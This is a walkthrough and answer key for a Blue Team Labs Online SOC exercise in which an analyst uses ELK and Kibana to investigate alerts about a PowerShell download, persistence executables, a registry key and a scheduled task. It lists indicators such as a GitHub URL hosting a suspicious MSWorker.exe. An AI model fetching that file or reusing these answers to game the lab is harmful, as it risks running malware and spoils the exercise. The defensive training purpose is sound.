SOC ALPHA 1 — Blue Team Labs Online Walkthrough
- ELK
- Log Analysis
- Network Analysis
Alerts File: use the read me file to get all the details on the alerts.
ELK should start within 5 minutes, if not try starting the services manually by running the commands below:
sudo systemctl start elasticsearch
sudo systemctl start kibana
sudo systemctl start logstash
Scenario : You are a SOC analyst and handling the alerts within your SIEM, ELK, is part of daily duties. Answer the following questions by analyzing the alerts provided in README.txt!
NB: Q — Stands for Question and A- stands for Answer.
Q. Alert 1 (1/2) — What is the cmdlet used for downloading?
Lets begin by first understanding what a cmdlet is. So what is a cmdlet? A cmdlet is a tinny lightweight command used in the windows powershell environment. It exists as a small script used to perform specific singular function such as copying files or changing directories.
Access the kibana with firefox at http://localhost:5601/.
Go to Analytics then click on discover.
Use the read me file to get details of the alert in question.
A. invoke-webrequest(this cmdlet sends http,https,ftp and file requests to a web page or web service.It parses the response and returns collections of forms,link,images and other significant HTML elements-for more information visit this link https://learn.microsoft.com/en-gb/powershell/module/Microsoft.PowerShell.Utility/Invoke-WebRequest?view=powershell-5.1)
Q. Alert 1 (2/2) — What is the full URL from which the file is downloaded?
A. https://raw.githubusercontent.com/nerrorsec/SBT-SOC/main/MSWorker.exe"
Q. Alert 2 (1/1) — What is the name of the suspicious EXE that is added for Persistence?
A. MSworker.exe
Q. Alert 3 (1/2) — What is the name of the suspicious executable file involved?
A. service.exe
Q. Alert 3 (2/2) — What is the name of the key path?
A. service
Q. Alert 4 (1/2) — What is the name of the task?
A. My Task
Q. Alert 4 (2/2) — What is the full path of the program?
A. C:\Program Files\GameLoaderGen\gen.bat
